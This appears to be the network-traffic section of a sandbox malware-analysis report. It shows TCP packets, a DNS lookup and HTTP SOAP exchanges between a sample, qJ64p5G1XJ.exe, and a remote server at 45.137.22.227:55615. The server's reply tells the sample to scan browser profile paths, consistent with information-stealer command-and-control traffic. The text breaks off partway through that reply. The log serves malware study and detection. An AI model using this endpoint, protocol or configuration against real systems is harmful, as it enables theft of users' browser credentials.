Jan 22, 2025 14:12:13.473767042 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473774910 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473788023 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473798990 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473802090 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473817110 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473824978 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473838091 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473845005 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473877907 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473886013 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473947048 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473956108 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473974943 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473983049 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474035025 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474042892 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474082947 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474091053 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474144936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474153042 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474211931 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474220037 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474261999 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474270105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474309921 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474318027 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474395990 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474404097 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474452972 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474459887 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474493027 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474500895 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474565029 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474574089 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474585056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474598885 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474673033 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474680901 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474704981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474713087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474749088 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474756956 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474797964 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474805117 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474857092 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474865913 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474966049 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.474973917 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475008011 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475017071 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475064993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475071907 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475177050 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475184917 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475193024 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475209951 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475223064 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475230932 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475269079 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475275993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475363970 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475372076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475400925 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475409031 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475444078 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475469112 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475548983 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475557089 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475590944 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475598097 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475697994 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475701094 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475709915 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475729942 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475811958 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475820065 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475850105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475888968 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475898981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475919008 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.475961924 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476012945 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476092100 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476099968 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476135015 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476159096 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476212025 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476223946 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476296902 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476305008 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476355076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476372957 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476475954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476484060 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476499081 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476522923 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476531982 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476538897 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476589918 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476603985 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476618052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476625919 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476672888 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476680994 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476722956 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476731062 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476762056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476769924 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476778030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476809978 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476865053 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476872921 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476877928 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476900101 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476982117 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.476989031 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477051973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477060080 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477097034 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477103949 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477219105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477226973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477257013 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477272034 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477278948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477288008 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477394104 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477401972 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477443933 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477452993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477497101 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477505922 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477657080 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477664948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477689028 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477695942 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477740049 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477746964 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477754116 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477770090 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477818966 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477827072 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477848053 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477855921 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477888107 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477895975 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477941036 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477948904 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477982044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.477993011 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478004932 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478013992 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478126049 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478133917 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478173018 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478180885 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478323936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478332043 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478342056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478360891 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478369951 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478377104 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478398085 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478405952 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478447914 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478461981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478476048 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478483915 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478547096 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478560925 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478574991 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478581905 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478621006 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478629112 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478657007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478662968 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478694916 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478702068 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478741884 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478754997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478764057 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478773117 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478823900 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478837967 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478852034 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478858948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478895903 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478904009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478940964 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.478949070 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479003906 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479012012 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479024887 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479032993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479055882 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479067087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479095936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479108095 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479130983 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479139090 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479217052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479224920 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479233980 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479249954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479259968 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479266882 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479269981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479276896 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479329109 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479336977 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479370117 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479378939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479404926 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479420900 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479434967 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479443073 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479485035 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479494095 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479598999 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479608059 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479623079 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479630947 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479645967 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479660988 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479672909 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479688883 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479727030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479744911 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479759932 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479767084 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479804993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479825974 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479832888 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479842901 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479872942 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479890108 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479963064 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479970932 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.479994059 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480000973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480015039 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480021954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480077982 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480089903 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480103016 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480112076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480159998 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480168104 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480190039 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480197906 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480233908 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480241060 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480283976 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480292082 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.480298996 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.520760059 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:14.501149893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:14.525356054 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:14.526205063 CET	49740	55615	192.168.2.4	45.137.22.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 14:12:07.062269926 CET	50492	53	192.168.2.4	1.1.1.1
Jan 22, 2025 14:12:07.069096088 CET	53	50492	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 22, 2025 14:12:07.062269926 CET	192.168.2.4	1.1.1.1	0x279a	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 22, 2025 14:12:07.069096088 CET	1.1.1.1	192.168.2.4	0x279a	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 22, 2025 14:12:07.069096088 CET	1.1.1.1	192.168.2.4	0x279a	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.13.31	A (IP address)	IN (0x0001)	false
Jan 22, 2025 14:12:07.069096088 CET	1.1.1.1	192.168.2.4	0x279a	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.12.31	A (IP address)	IN (0x0001)	false
Jan 22, 2025 14:12:07.069096088 CET	1.1.1.1	192.168.2.4	0x279a	No error (0)	api.ip.sb.cdn.cloudflare.net		172.67.75.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ip.sb

45.137.22.227:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	45.137.22.227	55615	2196	C:\Users\user\Desktop\qJ64p5G1XJ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 22, 2025 14:12:01.048774004 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.227:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 22, 2025 14:12:01.687036991 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Jan 2025 13:12:01 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jan 22, 2025 14:12:06.743590117 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.227:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 22, 2025 14:12:06.917927980 CET	25	IN	HTTP/1.1 100 Continue
Jan 22, 2025 14:12:07.018158913 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Jan 2025 13:12:05 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User 